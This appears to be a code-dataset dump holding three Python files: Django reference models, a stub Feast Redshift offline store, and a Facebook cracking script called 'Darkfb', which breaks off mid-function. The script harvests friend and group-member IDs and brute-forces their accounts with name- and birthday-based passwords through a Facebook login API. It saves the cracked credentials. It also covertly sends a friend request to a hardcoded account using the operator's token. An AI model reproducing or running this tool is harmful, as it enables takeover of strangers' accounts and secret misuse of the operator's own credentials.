blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f0604eb1eda455d4c3331f7ba6b004803d219ff0
|
bf23b069899d2a134804866bcddc8e82b1908ecc
|
/ag/reference/models.py
|
7243dc2137ac2939df62b8f7710cde7cbbd0ae4b
|
[] |
no_license
|
mcpelletier/ag2017_auf_org
|
87440741eda16436181e0774ed06ae13116dd8c0
|
23718dec8b62043337d4535dd5da1e58d64cef5c
|
refs/heads/master
| 2020-04-06T04:03:04.389839
| 2017-05-09T16:09:44
| 2017-05-09T16:09:57
| 83,065,128
| 0
| 0
| null | 2017-02-24T17:15:11
| 2017-02-24T17:15:11
| null |
UTF-8
|
Python
| false
| false
| 3,182
|
py
|
# -*- encoding: utf-8 -*-
from django.db import models
# Codes shared by the choice lists on the models below.
# Membership status codes (Etablissement.STATUT_CHOICES):
CODE_TITULAIRE = 'T'   # full (titular) member
CODE_ASSOCIE = 'A'     # associate member
# Institution "qualité" codes (Etablissement.QUALITE_CHOICES):
CODE_RESEAU = 'RES'             # network of institutions
CODE_ETAB_ENSEIGNEMENT = 'ESR'  # higher-education & research institution
CODE_CENTRE_RECHERCHE = 'CIR'   # research centre or institution
class Pays(models.Model):
    """Reference country, flagged as belonging to the "north" or "south"."""

    class Meta:
        ordering = ('nom',)

    # ISO-style two-letter country code.
    code = models.CharField(max_length=2, unique=True)
    nom = models.CharField(max_length=255)
    sud = models.BooleanField()

    def get_sud_display(self):
        """Return the human-readable label for the ``sud`` flag."""
        if self.sud:
            return u"sud"
        return u"nord"

    def __unicode__(self):
        return self.nom

    def __repr__(self):
        return u"<Pays: {}>".format(self.nom)
class Region(models.Model):
    """Geographic region, optionally managed by a bureau (Implantation)."""
    class Meta:
        ordering = ('nom',)
    code = models.CharField(max_length=255, unique=True)
    nom = models.CharField(max_length=255)
    adresse = models.TextField(null=True)
    # Bureau managing this region; declared as a string reference because
    # Implantation is defined later in this module.
    implantation_bureau = models.ForeignKey('Implantation', null=True,
                                            related_name='gere_region')
    def __unicode__(self):
        return self.nom
    def __repr__(self):
        # NOTE: unlike Pays.__repr__, this shows the id, not the name.
        return "<Région: {}>".format(self.id)
class Etablissement(models.Model):
    """Member or candidate institution, with its contact person details."""
    class Meta:
        ordering = ('nom', )
    # Membership status; 'C' (candidate) has no module-level constant.
    STATUT_CHOICES = (
        (CODE_TITULAIRE, 'Titulaire'),
        (CODE_ASSOCIE, 'Associé'),
        ('C', 'Candidat'),
    )
    # Kind of institution (teaching, research, network).
    QUALITE_CHOICES = (
        (CODE_ETAB_ENSEIGNEMENT,
         "Établissement d'enseignement supérieur et de recherche"),
        (CODE_CENTRE_RECHERCHE, "Centre ou institution de recherche"),
        (CODE_RESEAU, "Réseau"),
    )
    nom = models.CharField(max_length=255)
    pays = models.ForeignKey(Pays)
    region = models.ForeignKey(Region, blank=True, null=True,
                               verbose_name='région')
    # Postal address of the institution.
    adresse = models.CharField(max_length=255, blank=True)
    code_postal = models.CharField(u'code postal', max_length=20, blank=True)
    ville = models.CharField(max_length=255, blank=True)
    telephone = models.CharField(u'téléphone', max_length=255, blank=True)
    fax = models.CharField(max_length=255, blank=True)
    # Contact person ("responsable") for the institution.
    responsable_genre = models.CharField(u'genre', max_length=1, blank=True)
    responsable_nom = models.CharField(u'nom', max_length=255, blank=True)
    responsable_prenom = models.CharField(
        u'prénom', max_length=255, blank=True
    )
    responsable_fonction = models.CharField(
        u'fonction', max_length=255, blank=True
    )
    responsable_courriel = models.EmailField(u'courriel', blank=True)
    statut = models.CharField(
        max_length=1, choices=STATUT_CHOICES, blank=True, null=True)
    qualite = models.CharField(
        u'qualité', max_length=3, choices=QUALITE_CHOICES, blank=True,
        null=True
    )
    # Whether the institution is currently a member.
    membre = models.BooleanField(default=False)
    def __unicode__(self):
        return self.nom
    def __repr__(self):
        return u"<Établissement: {}-{}>".format(self.id, self.nom)
class Implantation(models.Model):
    """Local office (bureau) of the organisation, attached to a region."""
    class Meta:
        ordering = ('nom_court', )
    nom = models.CharField(max_length=255)
    # Short display name; also used for default ordering above.
    nom_court = models.CharField(max_length=255, blank=True)
    region = models.ForeignKey(Region, null=True)
    def __unicode__(self):
        # NOTE(review): returns the short name, which may be blank.
        return self.nom_court
|
[
"benselme@gmail.com"
] |
benselme@gmail.com
|
343fdac3f2f5608dce024042484943d8357628a0
|
d2bcaa6c021a965c5905053a512c83e5a72ce31a
|
/sdk/python/feast/infra/offline_stores/redshift.py
|
18509581118bb225c1c64e490e97de3212d35bfb
|
[
"Apache-2.0"
] |
permissive
|
Cimpress-MCP/feast
|
bafdbd29a99d9bda7f9cdedb91de5d9fc9ecf3c4
|
6eea808a6efdbf40949225f0bbd525fc0f03ab90
|
refs/heads/master
| 2023-06-23T03:29:54.288154
| 2021-07-15T17:32:31
| 2021-07-15T17:32:31
| 270,780,384
| 0
| 0
|
Apache-2.0
| 2021-07-15T17:56:53
| 2020-06-08T18:27:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,695
|
py
|
from datetime import datetime
from typing import List, Optional, Union
import pandas as pd
from pydantic import StrictStr
from pydantic.typing import Literal
from feast.data_source import DataSource
from feast.feature_view import FeatureView
from feast.infra.offline_stores.offline_store import OfflineStore, RetrievalJob
from feast.registry import Registry
from feast.repo_config import FeastConfigBaseModel, RepoConfig
class RedshiftOfflineStoreConfig(FeastConfigBaseModel):
    """ Offline store config for AWS Redshift """

    type: Literal["redshift"] = "redshift"
    """ Offline store type selector"""

    cluster_id: StrictStr
    """ Redshift cluster identifier """

    region: StrictStr
    """ Redshift cluster's AWS region """

    user: StrictStr
    """ Redshift user name """

    database: StrictStr
    """ Redshift database name """

    s3_path: StrictStr
    """ S3 path for importing & exporting data to Redshift """
class RedshiftOfflineStore(OfflineStore):
    """Offline store backed by AWS Redshift.

    Both interface methods are currently unimplemented stubs (they return
    ``None`` instead of a ``RetrievalJob``); callers should not rely on
    them until they are filled in.
    """

    @staticmethod
    def pull_latest_from_table_or_query(
        config: RepoConfig,
        data_source: DataSource,
        join_key_columns: List[str],
        feature_name_columns: List[str],
        event_timestamp_column: str,
        created_timestamp_column: Optional[str],
        start_date: datetime,
        end_date: datetime,
    ) -> RetrievalJob:
        # TODO: not implemented yet — stub required by the OfflineStore
        # interface; deliberately left as `pass` (returns None).
        pass

    @staticmethod
    def get_historical_features(
        config: RepoConfig,
        feature_views: List[FeatureView],
        feature_refs: List[str],
        entity_df: Union[pd.DataFrame, str],
        registry: Registry,
        project: str,
        full_feature_names: bool = False,
    ) -> RetrievalJob:
        # TODO: not implemented yet — stub required by the OfflineStore
        # interface; deliberately left as `pass` (returns None).
        pass
|
[
"noreply@github.com"
] |
Cimpress-MCP.noreply@github.com
|
ebfc8a9392625461ceff2085805d5e8cc562e424
|
e96590c1474a2267c99bd1aed81f4c3e3f056e93
|
/Darkfb
|
fbba1679a85f35f8c03cecaebbb01ded66a4aebd
|
[] |
no_license
|
Warriors12-pl/Imsenza
|
a72e66491d28e59c6cd8d36c5f30e8bcaef99963
|
9ca5e03f9cbce957fa56ef763c0fa4ae3b1a19d2
|
refs/heads/master
| 2022-11-17T14:54:14.568507
| 2020-07-18T17:46:06
| 2020-07-18T17:46:06
| 280,707,732
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,179
|
#!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93mimsenza \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/imsenza \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/imsenza \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="im" and password =="senza":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
